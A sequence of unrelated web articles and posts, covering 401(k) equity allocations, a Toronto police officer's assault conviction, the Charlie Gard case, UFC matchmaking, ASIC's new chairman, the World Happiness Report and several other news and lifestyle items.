More than that, we will have proved what many of us (but not enough) already know: that we are actually smart enough, kind enough and team spirited enough to run this show without them.
Discuss!
Feel free to comment here about how this might work, how it might not, how we would increase access to internet to ensure digitial democracy was possible and so on..
Check it Out!
Go look at some crowd funding websites and see it in action. Here are a couple:
ImpactCrowd
Sponsume
Crowdfunder
Do it!
Got an idea, or a need that is being left unsolved by this system? Go set it up as a crowd sourcing/funding idea and test it out.
And this is my contribution to Suzanne Collins and her trilogy 'The Hunger Games'. It's safe to say this is one of the best book series I've read with some of the most impactful literary characters I've encountered. Besides Katniss and her sister, to whom this drawing is dedicated, I have a HUGE literary crush on Alma Coin, but then again I always have a crush on the ruthless power-hungry dictators. Alma Coin is a special one though - unlike other villains, whose motives were at least partially evil, she's completely devoid of both positive and negative emotional traits, and acts like a robot-dictator, doing what she does not out of good or evil, but out of pure and honest practical intentions. She's not two-faced, she's not scheming, she's just totally blunt and honest in her words and actions. Although she's human, there's nothing human in her behavior and character. And I'm shutting up before I write a whole freaking essay.
This is pencil+charcoal.
More than 7 years after the cyclical top in 2007, 401(k) investors are finally getting more comfortable with stocks again. According to Aon Hewitt, the average percentage of 401(k) accounts allocated to equities reached 66.5% in February. While still below the May/June 2007 cycle peak of 69%, this is the highest level since December of 2007.
One might say “So what? Stocks are at all-time highs so of course stock allocations are up.” That's true. But with the S&P 500 some 40% above the 2007 (and 2000) market peak, allocations to equities are still below their highs of 2007. Why is that? We have often mentioned that the Federal Reserve's data series showing the “% of Household Assets Invested in Stocks” (updated quarterly and released today as a matter of fact) is perhaps our favorite chart in all finance. The series reveals a lot of information about both investment allocations and investor human nature.
For example, it illustrates the psychological toll that bear markets have on investors. Take the 1966-1982 secular bear market. Household assets in stocks trended downward from a peak of over 30% in the late 1960′s, even as the stock market generally moved sideways. The repeated cyclical declines within the secular bear led to more and more distrust on the part of investors. Each advance in the market resulted in lower peaks in household investment and each decline led to lower lows. By the time the secular bear ended in 1982, households had an all-time low 15% of their financial assets in the stock market.
This 401(k) stock allocation chart reveals a similar pattern taking place since 2000. While the market generally went sideways from 2000 until breaking out in 2013, the nasty cyclical declines in 2002 and 2008 led to a declining trend in 401(k) stock investment. After reaching an all-time high near 75% in 2000, subsequent peaks in stock investment have fallen well short of that level. Meanwhile the 2009 low in allocation was well below the low in 2003. Why the downtrend? Because human nature influences investors to sell near the bottom of painful declines. Thus, when markets turn back around, they have less capital invested and recover much more slowly than the stock averages. This was indeed the case with 401(k) investors over the past 15 years. According to Aon Hewitt, the biggest outflows from stock funds during that period occurred near the market lows in February 2003 and October 2008.
So is there any message now in the fact that equity allocations are now back to 2007 levels? Well, this is one study that does not lend itself to objective signals or triggers unfortunately. Rather, it likely comes down to one's subjective interpretation – and we can see both sides to it. On the one hand, the argument can be made that, given the fact that the stock averages are well above their 2000 and 2007 peaks, current 401(k) allocations are actually low. Thus, there is more upside to both allocations and the market.
We understand that case, however, we don't necessarily agree with it. We would refer back to what we mentioned above regarding the effect of secular bear markets on investor behavior. In such a scenario, we would expect lower peaks in stock allocations at market highs. Thus, with little room to go to the 2007 allocation peak, our feeling is that allocations are closer to the end of a cycle than the beginning of a new long-term uptrend.
“Wait, so you're saying we're still in a secular bear market with prices 40% higher than the prior peaks?!?!” We understand that sounds crazy to some folks. We certainly don't dismiss the significant new highs in prices as it pertains to the secular bull/bear market debate. And we readily admit that arguing for the continuation of the post-2000 secular bear market is way out of consensus at this point. However, we have our reasons for at least considering the possibility that the secular bear market did not end in 2009. We have covered most of those reasons elsewhere but will touch on a few things to consider.
First, it is the sustainability of the new highs that will determine whether or not the secular bear market is truly over. And while it seems far-fetched that prices could decline back to the 2000-2013 range again, it is well within the realm of possibility as it would “only” take a 25% decline to get there. Secondly, the behavior of investors like that seen in the 401(k) allocation chart is still emblematic of secular bear market action. The lower highs and lows in allocation should be expected during such a scenario. And while it would also be expected to see investors slow to climb aboard a new secular bull market, there are other factors that lead us to believe that the secular bear may reawaken at some point.
One other point we will mention is that the “Household % in Stocks” series has surpassed its 2007 peak. Does this dispel our “secular bear investment behavior” thesis? We have an open mind about it, but we don't think it does necessarily. Consider that it took Households more than a year after the market's breakout to new highs to finally reach their 2007 peak investment in stocks. Meanwhile, stock averages are 40% higher than their previous peak. Based on that fact, household investment is still lagging far behind the market.
So why are 401(k) investors not at new highs in equity allocation as well? It's not clear but we have our theory. For most 401(k) investors, their entire retirement savings are contained in their 401(k). They have no other real investments. Therefore, they have more to lose when it comes to the performance of their 401(k) than do other investors. And therefore, the human natural pressure on them is greater, including “fear”. This is especially relevant at bear market lows, as we indicated. Their desire to protect what they do have has forced them to bail out of stocks at the very worst times.
If nothing else, this study should serve as a message to the industry: 401(k) participants need investment help. The defined contribution system has dictated they become investment experts. That isn't fair. And, outside of re-engineering the retirement investment system, it should be a priority for those in the industry to seek out and help these individuals.
__________
“401K” photo by 401(K) 2012.
More from Dana Lyons.
The commentary included in this blog is provided for informational purposes only. It does not constitute a recommendation to invest in any specific investment product or service. Proper due diligence should be performed before investing in any investment vehicle. There is a risk of loss involved in all investments.
Yelp is making it easier for users to find business with gender-neutral bathrooms, the company announced today. Starting today, a yes/no on gender-neutral restrooms will now show up as yet another attribute about a business you're looking at.
“What constitutes a gender neutral restroom, you ask? Gender neutral restrooms are accessible to persons of any gender and are a locking, single-stall bathroom,” said Rachel Williams, Yelp's head of diversity and inclusion, in a blog post. In the next few weeks, you'll be able to filter business to display only those with a gender-neutral bathroom, if you wish.
The app will soon begin asking users who check into locations with the app whether or not they have access to gender-neutral restrooms. Business owners can also update their own listings with the info.
Yelp is among the dozens of tech companies that yesterday filed an amicus brief in support of Gavin Grimm, a trans student who is currently involved in a United States Supreme Court case over bathroom access. “At Yelp we thrive on inclusion and acceptance, and we hope that our support for Gavin's case and the addition of this new business attribute will help our friends in the LGBTQQIA community,” Williams said.
A Toronto criminal defence lawyer assaulted by her ex-boyfriend, a police officer, is demanding an explanation from the police union's head about why it funded his defence, even though it involved off-duty domestic charges. “I am directly calling into question the integrity of your organization,” Kathryn Wells writes to Toronto Police Union president Mike McCormack in her March 13 email.
Toronto police officer Jason Peacock, seen arriving at College Park Courtto enter his plea on charges of assault earlier this year. ( LUCAS OLENIUK / TORONTO STAR ) Criminal defence lawyer Kathryn Wells is asking why the Toronto Police Association apparently aided the defence of an officer who assaulted her while off duty.
“Women in our communities (particularly those involved with police officers) need to know that the Toronto Police Association does not turn a blind eye to domestic violence by funding cases of officers who are violent towards the women in their lives when they are off duty.” After an eight-day trial in January, Ontario Court Justice Michael Epstein convicted Const. Jason Peacock, her one-time boyfriend, of assault and one count of mischief for causing more than $4,000 damage to her condo. Wells, 35, said in her email to McCormack that throughout the case, defence lawyer Devin Bains required the assistance of a junior lawyer and a secretary in court. “Not only that, the association also funded a Superior Court bail review in which Jason Peacock sought to have the no-drinking condition removed from his recognizance,” Wells wrote.
Article Continued Below
Last July 5, Bains told Justice Mary Lou Benotto the no-alcohol ban was “humiliating” for his client “particularly now that the summer social season is here.” The judge rejected the request, noting “it is not impossible in social situations to drink non-alcoholic beverages without embarrassment. Indeed, they can be consumed discreetly and can easily pass for alcoholic beverages.” Peacock's sentencing hearing was put off Friday. It will now occur April 30. The Crown seeks 15 to 30 days in jail, three years probation and restitution of $4,300 for the damage he did to her condo. Peacock, 40, refused to comment Friday about whether the union has funded his defence. But in a March 26, 2011 email sent to Wells' legal partner, John Scarfe, Peacock wrote “luckily I am getting coverage from my association for my legal expenses.”
In an emailed response to Wells' request for a meeting, McCormack said he could not discuss the issue of Peacock's legal counsel as the matter is still before the court. (He later reiterated the position to the Star.) “The Toronto Police Association is a strong advocate against domestic violence,” McCormack added in his email.
Article Continued Below
Wells said she contacted McCormack this week after two earlier emails sent to the TPA's director of legal services were ignored. The TPA makes its legal funding decisions on a case-by-case basis, McCormack has said in the past. A legal committee makes those decisions. A copy of the TPA's financial assistance for legal services plan and fund, obtained by The Star, says the following: “In appropriate cases, to provide on a “without prejudice” basis, financial assistance benefits to a member of the plan, when the member is charged in relation to an act(s) in the attempted performance in good faith of his or her duties as an employee of the service …” It adds a decision by the plan board to provide or deny financial assistance benefits “is not based on the alleged or determined innocence or guilt of the member who has been charged with a criminal offence.” In an interview Friday, Wells said “the average person who is charged by Toronto police does not have this powerhouse fund behind them,” though there are certainly legitimate reasons for the fund to exist. She added that, ultimately, it appears taxpayers footed Peacock's legal bills. The incident occurred early Christmas Eve 2010 after a long argument when Wells ordered Peacock to leave her home, where he had been staying. He swore at her, shook her hard by the shoulders, punched holes in her walls, smashed drinking glasses and overturned her marble-topped kitchen island, she testified. The 6-foot-1 officer denied shaking the 5-foot-4- lawyer, saying she in fact kicked and pushed him, causing damage to the wall. The judge found Peacock's version of events “implausible in many respects.” After the judgment, the Toronto Police Service suspended him with pay.
A US hospital has offered to treat terminally ill Charlie Gard for FREE - just hours after President Donald Trump said he would be "delighted" to help the tot.
A European court has ruled that little Charlie - suffering with mitochondrial depletion syndrome - should have his life support machine switched off.
PA:Press Association 5 A court has backed doctors' decision to switch off Charlie Gard's life support
PA:Press Association 5 Charlie's parents have launched a campaign to give their son a final shot at life
Getty Images 5 Now the US President has added his voice to the campaign to save Charlie
If we can help little #CharlieGard, as per our friends in the U.K. and the Pope, we would be delighted to do so. — Donald J. Trump (@realDonaldTrump) July 3, 2017
But one kind-hearted group of doctors Stateside has pledged to provide free care for little Charlie.
Earlier billionaire US President had joined the battle to help the ten-month-old undergo an experimental treatment in America.
He wrote: "If we can help little # CharlieGard, as per our friends in the U.K. and the Pope, we would be delighted to do so."
And it is understood that an American hospital has offered to treat the sick tot for free if he is allowed to cross the Atlantic.
A Twitter account linked to the campaign to save the youngster replied: "Thanks @realdonaldtrump for your support - @teresamay do the right thing and #savecharliegard."
Trump's words come just one day after Pope Francis added his voice to calls for Charlie to be given one final shot at life.
most read in news Exclusive PIE ROLLER £148m EuroMillions winner scoffs 50 home-delivered Cornish pasties every WEEK Exclusive BRUTE FARCE Albanian murderer fighting boot from UK 'to avoid splitting family' beats wife MOMO NO-NO Momo Challenge in 'Peppa Pig and Fortnite vids' as YouTube and Instagram slammed MOMO SHOCK Creepy 'suicide character' Momo told lad, 8, to 'stab himself in neck' 'HE STRANGLED ME' Girl, 10, 'pretended to be dead to stop boy, 16, raping her on way home' Exclusive DARK PAST Homeless man doused in water by rail staff KILLED man who splashed him with paint TREE OF TERROR Mum horrified to learn what the strange 'pods' were hanging from branches CRUISE YOU LOSE Clueless couple stranded as cruise leaves WITHOUT them because they're late BLOOD ON THE STREETS Man, 20, knifed to death in 4th horror stabbing in 7 hours in London SUICIDE WARNING What is Momo and how can parents protect their children?
The pontiff said Charlie's parents Chris Gard and Connie Yates should be allowed to "accompany and treat their child until the end".
A White House spokesperson said: “Upon learning of baby Charlie Gard's situation, President Trump has offered to help the family in this heartbreaking situation.
“Although the President himself has not spoken to the family, he does not want to pressure them in any way.
“Members of the administration have spoken to the family in calls facilitated by the British government.
“The President is just trying to be helpful if at all possible.
“Due to legal issues, we cannot confirm the name of doctor or hospital where the baby could be treated in the United States.”
Charlie suffers from a rare genetic condition and is unable to breathe unaided.
Last week, his parents lost a legal battle to take him to the United States for trial therapy.
They had raised more than £1.3million for the treatment but are now understood to be considering using the cash to set up a charity.
PA:Press Association 5 Connie Yates and Chris Gard were dealt a heartbreaking blow when a court decided they would not be able to seek experimental treatment for Charlie in the US
It comes after the couple, from Bedfont, West London, learned they had lost their final legal battle after Europe's top court said it would not intervene in the case.
They had pursued their case through the courts in the UK over the past three months, culminating in a decision by the European Court of Human Rights.
Specialists at Great Ormond Street Hospital (GOSH) in London, where terminally-ill Charlie is being cared for, said therapy proposed by a US doctor was experimental and wouldn't help.
They said life-support treatment for the youngster should stop.
Charlie's parents had asked European court judges in Strasbourg, France, to consider their claims after judges in the High Court, Court of Appeal and Supreme Court in London ruled in favour of GOSH doctors.
But Strasbourg judges refused to intervene.
We pay for your stories! Do you have a story for The Sun Online news team? Email us at tips@the-sun.co.uk or call 0207 782 4368
In an eye-opening new research paper called The Conceptual Separation of Food and Animals in Childhood, University of Bristol researchers Kate Stewart and Matthew Cole explore how we, as a society, teach our children a separate morality for food animals that intercepts a child's natural tendency to protect and empathize with all animals. As the paper points out, when we explain to children for the first time where meat comes from, their first reaction is often revulsion. Parents confront this moral quandary by explaining to children why farm animals have a different role in our lives than other animals.
These family traditions, along with current pop culture and food advertising influences, “contribute to a food socialization process whereby children learn to conceptually distance the animals they eat from those with whom they have an emotional bond or for who they feel ethically responsible.”1 Or, in other words, children learn what animals to love and which to eat, according to accepted social norms.
But this rigid moral framework doesn't make sense to all children. One Free from Harm member recently wrote to us describing a terrifying childhood experience: “When I was very young a pet pig who adopted me was taken to the slaughterhouse. It was humanely treated but it was stunned, decapitated and hung up by its legs and hacked apart length ways. This pig was my best friend, it was entrusted to me and I felt I had betrayed him. I was too young to realize that my parents would not do the same to me or my brother, so distrust, fears and nightmares were a regular occurrence for me.”2
Through popular film and literature narratives and advertising, Stewart and Cole delve deep into how we define this role that farm animals should play in our children's lives and also how we differentiate them from the roles of the other two major categories of animals: wildlife and pets. The Lion King, Babe, Charlotte's Web, Chicken Run and Bambi are some of the iconic movie references the authors tackle, carefully decoding their intricate moral constructs to reveal their powerful messages to our children. Equally fascinating is how these Hollywood film messages carry through to fast food industry advertising and product offerings to children. So the moral narrative flows from movie plot to Happy Meal, chock full of wildlife animal toys, nuggets and mini burgers. “Farmed animals, invisible and unmentioned as they are in literature and film, lay invisible and unmentioned in the meal box in burger or nugget form.”3
In Stewart and Cole's analysis, the most consistent messages that run through the narratives of children's film, literature and advertising are:
Farm animals are working animals, replaceable commodities or just absent all together , while carnivorous wild animals and pets have often highly-developed characters that “humanize” them and make us care about them.
, while carnivorous wild animals and pets have often highly-developed characters that “humanize” them and make us care about them. A child must lose empathy for animals to become a mature adult , as if it were a rite of passage (a theme in My Friend Flicka and Jungle Book).
, as if it were a rite of passage (a theme in My Friend Flicka and Jungle Book). Animals are defined based on their relative utility to humans. “Animals are saved if they transcend their species-being, specifically if they attain human-like qualities”4 (such transcendence occurs to the protagonists in Babe, Chicken Run and Happy Feet, thus saving them from their natural fate as prey)
“Animals are saved if they transcend their species-being, specifically if they attain human-like qualities”4 (such transcendence occurs to the protagonists in Babe, Chicken Run and Happy Feet, thus saving them from their natural fate as prey) Farm animals are objects or elements of production to which we should not attribute individual characteristics, as we do with our pets. Evidence of this objectification can be seen in how advertisers and filmmakers refer to various types of meat as pork or hamburger, rather than by the name of the animal.
Evidence of this objectification can be seen in how advertisers and filmmakers refer to various types of meat as pork or hamburger, rather than by the name of the animal. The mythical (non-scientific) notion that humans are at the top of the food chain, and therefore. our eating of animals lower than us is part of the circle of life (a theme central to The Lion King). In the Lion King, herbivorous animals have no names, no voices, no signs of intelligence, and are void of individual traits, while the lions (being carnivores at the top of the food chain) have rich and complex characters. “The Lion King depicts a rigid and immutable hierarchical pattern of social relations, and meat-eating as not only natural, but a scared duty to the ‘circle of life.'”5
But perhaps most importantly, Stewart and Cole's research lays bare the very assumptions that we have been indoctrinated with for generations about food animals. And the fact that we are living in an age where these assumptions are being challenged and unraveled means that the moral compass could be showing us a new path to our understanding of food, animals and ourselves. The times we live in demand this.
1 Stewart and Cole, The Conceptual Separation of Food and Animals in Childhood, 2011
2 A Free from Harm member who wishes to remain anonymous
3, 4, 5 Stewart and Cole, The Conceptual Separation of Food and Animals in Childhood, 2011
A special thank you to www.humanespot.org for bringing this paper to our attention.
Fans have been clamoring for the rematch between Jon Jones and Alexander Gustafsson ever since their epic championship bout at UFC 165 in September of 2013. Some consider that bout to be the greatest fight in company history.
After news broke the night of UFC 173 that Gustafsson agreed to terms on a rematch with Jones, everybody has been waiting on the champion to sign on for the historic rematch.
So what's the hold up?
According to UFC president Dana White, Jones doesn't want to fight Gustafsson. In fact, the champion has said that he would rather face Daniel Cormier, who is coming off a dominant victory over legend Dan Henderson.
"Just to clear up a couple things, people think we're in contract negotiations with Jon Jones - we're not. Jon Jones still has five fights left on his contract," White said Monday afternoon in an exclusive interview with UFC.com. "So what we're doing right now is trying to get him to sign the bout agreement for Gustafsson. He doesn't want to fight Gustafsson. ... Lorenzo and I have a meeting with Jones on Thursday to get him to sign the bout agreement, and he's asking to fight Cormier instead."
Cormier recently spoke to sportsworldnews.com and said he'd be willing to fight Gustafsson if Jones won't sign to fight the Swede. White said if Jones doesn't sign the contract, who knows, Cormier vs.
Gustafsson could be the move.
|| UFC FIGHT PASS: Watch Jones-Gustafsson 1 only on ||
White on Anderson Silva...
Silva's manager Ed Soares went on the MMA Hour Monday and spoke about "The Spider" and his recovery from a broken left leg back at UFC 168. He mentioned several potential fights for when Silva is ready to return, possibly in late 2014, but more likely in 2015.
"There's Michael Bisping, there's Cung Le. Even Nick Diaz," Soares told Ariel Helwani. "Nick Diaz has said he's wanted to fight him before. Nick Diaz wanted to box Roy Jones Jr. You could argue that Nick Diaz and Anderson probably have some of the best boxing in MMA, so we'll see what happens."
White said that any one of those fights could happen, leaving the door open to any number of potential match ups for the former UFC middleweight champ when he returns.
"I think that the landscape changes so much in MMA that by the time Anderson comes back, we'll see who's where and who's doing what. Any of those fights can happen. ... Nick Diaz has made it very clear that he would love to fight Anderson Silva," White said.
On Gegard Mousasi and UFC Super Saturday...
Many wondered how the UFC was going to pull off a doubleheader this past Saturday, holding events in Berlin and Brazil only hours apart. It was certainly a jam-packed day of fights, and for the most part fans and media members seemed to enjoy the day.
White said it was a very successful day for the UFC.
"It was a super successful weekend. Obviously we don't have the ratings back for Fox yet, but we did a great gate in Germany, we did a great gate in Brazil, and it had a big impact on UFC Fight Pass. The team out there did a great job of promoting Fight Pass in Germany, so we picked up a ton of new subscribers in Germany. It was a very successful weekend," White said.
"It was the first time ever we did a doubleheader of fights," White continued. "You're going to have people who think it's too much and don't want to watch, and you're going to have people that can't get enough. I can tell you this though, the finale in Brazil did 15 million viewers in Brazil."
Gegard Mousasi was absolutely sensational in his main event showdown with Mark Munoz. White said last week that he was a big fan of the Dutch former Strickforce champion, and Mousasi made the president look good Saturday night.
Mousasi now sits at No. 7 in the latest official UFC rankings, and White said that's where he should have been all along.
"Honestly, going into this fight, I believe Mousasi should have been ranked number six," White said. "He's where I think he should be, close at least. I think Mousasi is ready to face anybody. He fought the number one guy in the world, went the distance with him after being out for over a year with ACL surgery, and went the distance. The guy is ranked in the top six for sure."
> Check out the latest official UFC rankings
White on Fight Night Albuquerque...
This Saturday live on Fox Sports 1, the UFC comes right back with another free and exciting card. Former lightweight champ Benson Henderson faces up and comer Rustam Khabilov, Diego Sanchez battles Ross Pearson, and the always exciting John Dodson takes on John Moraga.
White said a lot is on the line for a number of fighters Saturday night, but specifically thinks Dodson-Moraga is going to steal the show.
"Obviously Diego and Ross Pearson is a great fight. Both have a ton to gain by winning," White said. "Then you got Moraga, who is a tough mother f*****. That is a great fight - I love that Dodson-Moraga fight. Dodson is bad ass. I think Dodson is the fastest guy, possibly in the world. He's very talented and very flashy, and Moraga is an old school, tough Mexican fighter that just keeps moving forward and throwing heavy punches. That's going to be a fun fight. They both want to get a win to get back in title contention to face Mighty Mouse (Demetrious Johnson) again."
White on Stipe Miocic...
Miocic made quick work of Fabio Maldonado Saturday night in the main event of the Ultimate Fighter Brazil 3 Finale. With Cain Velasquez and Fabricio Werdum set to meet later this year, White said Miocic still needs a big win over a top guy to get into the title picture.
"I think Stipe needs that Junior Dos Santos fight. That's the fight he should have had last weekend, it's the fight he wants and that's the fight that will put him in contention," White said.
> Check out the May 27 edition of "The Download"
It's open! Register to the 6th Annual DC Tweed Ride Now Posted by dandy on Thursday, October 23, 2014 · Leave a Comment
Register here, plan your look, and meet us for our legendary day of bikes, style, and fall celebration!
We'll start at a secret meeting place (you'll get an email with an exact location the Friday before the ride), cruise through the city, and party in classic dandy style.
The party will feature the legendary Dandy Wellington and His Band, burlesque entertainment, the Fidgety Feet Dancers, food, drinks, and of course the most stylish dandies and dames on this side of the Atlantic!
Three types of ticket are available:
Free Ride Registration ticket (enables us to e-mail you with start location details on 10/31/2014),**
Ticket to the Jazz Age Jam at Roofers Union without food, or
Ticket to our Jazz Age Jam at Roofers Union with food.*
*Tickets that include meals must be purchased by October 29 to provide the venue with enough notice to prepare for our hungry riders!
** You must register to the ride to receive the ride information and start location, even if you purchase party tickets. Each rider must register separately.
Tickets typically sell out in advance, so snag your ticket before it's too late!
China is building a manned spacecraft capable of sending astronauts to the moon as well as near-Earth orbit flight, according to Chinese state media.
The official newspaper of the Ministry of Science and Technology of China cited system chief architect Zhang Bainan who claimed the craft is being designed to carry as many as six astronauts.
The newspaper, Science and Technology Daily, quoted Zhang Bainan Tuesday as saying China wished to catch up with international standards of space exploration.
The fresh announcement follows a separate Chinese ambition to bring back samples from the
moon before the end of this year.
The unmanned Chang'e-5 lunar probe is undergoing a final round of tests and is expected to be on standby for launch from August, according to the official People's Daily.
China first landed an unmanned craft on the moon in December 2013. It marked the first spacecraft to land on the moon since the Soviet Union's Luna 24 in 1976.
The United States' Apollo 11 was the first manned mission to land on the Moon, on 20 July 1969.
Shipton's path into finance was more English than Australian. He studied Asian politics, history and economics at Melbourne University, and later completed a law degree at Monash University.
Whereas many of his contemporaries sought to establish their credentials in New York and London, Shipton relocated to Hong Kong after graduating. A wonderful networker with a self-deprecating manner, he flourished in the Asian business environment.
In 10 years he went from a legal assistant at Jardine Matheson, a conglomerate of 430,000 staff, to a managing director at Goldman Sachs, the world's most famous investment bank.
At Goldman Sachs he started in the division that provides services to hedge funds. After three years he became head of government and regulatory affairs, a job that made him responsible for liaising with the Hong Kong Securities and Futures Commission. He then turned from poacher to gamekeeper, becoming a manager at the financial markets regulator reporting to the CEO, which set him up perfectly to run ASIC.
At the SFC, as it is known, Shipton signed on to a three-year contract to oversee "intermediaries", stockbrokers, corporate finance firms, high-speed traders, investment managers, credit agencies and other market specialists. One of his main tasks was to merge its licensing and supervision teams.
Shipton was a resident student at the university's Ormond College in the late 1980s and early 1990s.
After his term ended, he spent a year as the deputy of an eight-person unit in Harvard University's law school that runs conferences on international financial regulation. The job appears to have been administrative. He wasn't mentioned in an in-house article last year on the unit's 30th anniversary and isn't on the law school's faculty directory.
Liberal pedigree
Advertisement
Shipton's father, Roger Shipton, was a prominent member of the Liberal Party's moderate grouping in Victoria when they were known as small-l Liberals or, less charitably, the wets.
The Shiptons' rambling Melbourne home was built in the 1880s. When James was growing up it still had century-old timber floorboards, 16-foot ceilings, brass beds and wide verandahs.
Roger Shipton was pushed out of Parliament by the wave of economically dry Liberals led by Michael Kroger, Rod and David Kemp and Peter Costello, who in 1990 took Shipton's seat of Higgins, which includes the wealthy suburbs of Toorak and South Yarra. He died eight years later.
Higgins was won in 2009 by Revenue Minister Kelly O'Dwyer. Andrew Meares
Higgins was won in 2009 by Revenue and Financial Services Minister Kelly O'Dwyer, a leader of the Liberal moderates, who remain on the defensive in Victoria. O'Dwyer had carriage of Shipton's appointment, an irony that will be lost on no one in the party.
(Kroger has returned as party president through an alliance with right-wing Christians.)
Shaking up ASIC
The government started planning for the succession for 12 months ago, when it hired US headhunter Heidrick & Struggles to mount a global search to replace ASIC chairman Greg Medcraft.
Advertisement
A small panel of public servants, including competition regulator Rod Sims and Treasury secretary John Fraser, vetted Heidrick & Struggles' shortlist.
"One person was outstanding," says O'Dwyer, who put Shipton's name to the Turnbull cabinet on Monday, which approved him.
(Coincidently, Health Minister Greg Hunt, who represents the seat that includes wealthy beach town of Portsea, lived at Ormond College a few years before Shipton and the investment bankers. And a Heidrick and Struggles Melbourne partner, Adam Badenoch, was at Ormond the same time as Shipton, although wasn't involved in the search.)
O'Dwyer argues Shipton has "unique characteristics" for the position: experience as a lawyer, banker and regulator.
Changing ASIC
There are signs the government wants Shipton to shift ASIC's focus. One of the government's concerns is the revelation last year that ASIC commissioners spent up to 80 per cent of their time managing the organisation rather than speaking to investors, companies and the public.
Overseas, some senior regulators spend half their time dealing with the outside world, a contrast that contributed to perceptions that ASIC was too inwardly focused.
"There was a massive gap between how ASIC saw itself performing and the industry view," O'Dwyer says.
Advertisement
Instead of being given another three-year term, Medcraft was granted an 18-month extension that ends next month.
In a prepared statement, Shipton appeared to allude to the government's wish to shake up ASIC. "All financial institutions globally need to continue their hard work on improving their own organisational dynamics and culture," he said.
Home front
On a personal level, Shipton is a renovation enthusiast. Ten years ago he bought a colonial-era three-storey house on Hong Kong island that contained the first European toilet installed in the village.
One of his problems involved inflexible bureaucracy: almost no banks would grant him a mortgage because there was no occupation certificate for the building, which was built in 1906, before such certificates existed.
"Explaining this to banks was difficult since rigid internal rules will not allow a mortgage without this particular document – a classic example of form over substance," he said at the time.
A couple of years ago I commented on the 2015 World Happiness Report, which showed Russia rising up the rankings. The 2017 version is now available, and for Russia it provides yet more good news.
I'm not convinced that ‘happiness' is the right word to describe what the report measures, but it is certainly measuring something connected with general well-being and life satisfaction. Each country's score is based on 8 factors: GPD per capita in terms of purchasing power parity; healthy life expectancy; social support, measured by answers to the question ‘If you were in trouble, do you have relatives or friends you can count on to help you?'; self-evaluated freedom to make life choices; generosity, determined by charitable giving; perceptions of corruption; ‘positive affect … defined as the average of laughter and enjoyment'; and ‘negative affect … defined as the average of previous day affect measures for worry, sadness, and anger.'
Two years ago, Switzerland was no. 1 in the world, and Russia was ranked 64th. This time, Norway is top and Russia is up to 49th.
More remarkably, Russia is ranked no. 7 in the world in terms of changes in happiness over the past 10 years. Russia is still some way behind the Western European and North American countries which dominate the top of the table, but it is catching up.
This is all the more remarkable given that Russia has suffered two major economic recessions since 2007, meaning that the GDP element of the happiness measurement has not increased. This in turn means that the more subjective elements of the measure must have improved quite significantly. Russians aren't richer than they were a decade ago, but they apparently evaluate their lives as being much better. Either they've been thoroughly bamboozled by state propaganda or something is actually going well for them.
By way of contrast, let us look at the bottom of the table of changes in happiness, 2005-2007 to 2014-2016:
Ukraine's dismal performance suggests that, at least in the short term, Euromaidan has had a highly negative effect on Ukrainians' state of mind. Meanwhile, although France and the United States remain highly ranked overall (31st and 14th), they are falling down the table fairly fast.
Make of all this what you will. As I said, I'm not entirely sure what this is really measuring. But if you're looking for an explanation of Vladimir Putin's popularity, the election of Donald Trump, and the rise of Marine Le Pen, this report perhaps provides at least part of the answer.
Advertisements
Please enable Javascript to watch this video
DENVER -- After more than a year of fundraising and jumping typical new alcohol business hurdles, Brewability Lab is open for business.
The idea is to hire people with developmental disabilities, train them how to brew beer and hopefully improve their standard of living.
The brewery is the brainchild of Tiffany Fixter, a special education teacher who saw a greater need in adults with disabilities.
"I was running a day program when I realized from age 21, they don't have a lot of options and I don't think sitting around in a warehouse coloring is an appropriate option," Fixter said.
In October 2015, Fixter launched a Kickstarter.com page.
She raised more than $30,000, propelling her desire to buy brewery equipment and lease a brewery space.
"We're doing training for assistant brewers ,sanitation managers, glassware specialists and beertenders," Fixter said. "Everybody has a skill. So, it's just figuring out what they do best and employing them. Everyone should have a purpose."
Tony Saponaro has been with Fixter since the beginning. For the past year, he has been working once a month with Fixter to create new beer recipes, but since the brewery is now open, he hopes to work full time.
"I feel really great about it. Once you've been on such a long journey it's great to finally see some results," Saponaro said. "I just wanted to thank Tiffany for all of her work getting here. It's been really hard."
The brewery debuted four beers: A session IPA, a blonde ale, a brown and Belgian beer. First-time visitors seemed pleased by the quality.
"For one, I love the idea, but the beer is pretty good," Diana Smith said.
Fixter hopes to hire several more positions.
Image caption British Gas reported the problem to Ofgem in April last year
The UK's biggest energy supplier, British Gas, mis-sold energy deals by making exaggerated claims to potential customers, the regulator has said.
Ofgem said British Gas sales staff did not make accurate comparisons between suppliers' deals, and so made overblown claims about savings for switching.
The cases involved British Gas staff working in Sainsbury's stores nationwide between 2011 and 2013.
An average of £130 compensation has been paid to 4,300 affected customers.
The company has been unable to contact another 1,300 affected customers, so their compensation will also go into a fund to help vulnerable customers.
'Poor behaviour'
The total compensation bill is £566,000, with a further £434,000 being paid into the same fund as part of the penalty.
The payout is modest in comparison to some mis-selling penalties handed down to some energy companies in recent years.
In May, E.On agreed to a record £12m penalty for phone and doorstep mis-selling, in addition of compensation payments of between £3m and £8m. A number of other energy suppliers also faced bills for this type of mis-selling.
"Ofgem expects all suppliers to put this poor behaviour behind them and really start acting in a way that will help consumers trust energy suppliers. Where they don't, Ofgem will act," said Sarah Harrison, of Ofgem.
'Swift action'
In the British Gas case, staff failed to make it clear to potential customers that Sainsbury's Energy was actually being supplied by British Gas.
They also compared monthly direct debit bills to those for people who made quarterly payments. As a result this exaggerated the potential savings available.
Other potential customers were approached by sales staff at the Westfield Shopping Centre, at Shepherd's Bush in west London.
British Gas said that it had discovered the issue through its own internal checks, then took "swift and decisive action" to contact and compensate customers, before contacting Ofgem.
"We are very sorry and have ensured no customer will be out of pocket as a result," said Ian Peters, managing director of British Gas Residential.
A spokeswoman for Sainsbury's said: "As you would expect, we have taken this very seriously and ensured British Gas compensated customers."
Japan Trend Shop
You can aim for the stars with your iPhone 5/5S and take some sweet moon shots while you're at it, if you're ready to invest in a telescope made just for your phone.
The iPhone 5 Astronomical Telescope from Japan Trend Shop has a 700mm focal length and can magnify 100 times and show you the view on your phone's screen. This has some advantages over squinting into a regular telescope eyepiece. You can share the view with others around you and easily take photos.
The set includes a tripod and stand, a diagonal prism, two ocular lenses, a 1.5x erecting lens, and a 12x magnification lens.
There are ways to adapt regular telescopes to work with a smartphone. Telescope builder Luke Gruenert demonstrates this with an HTC One that generated some spectacular moon shots. The appeal of the Astronomical Telescope may be that you don't have to mess around with fixing up a phone mount. It's just ready to go, though it can also be used like a regular telescope with just your eyes, which may feel a bit old-fashioned.
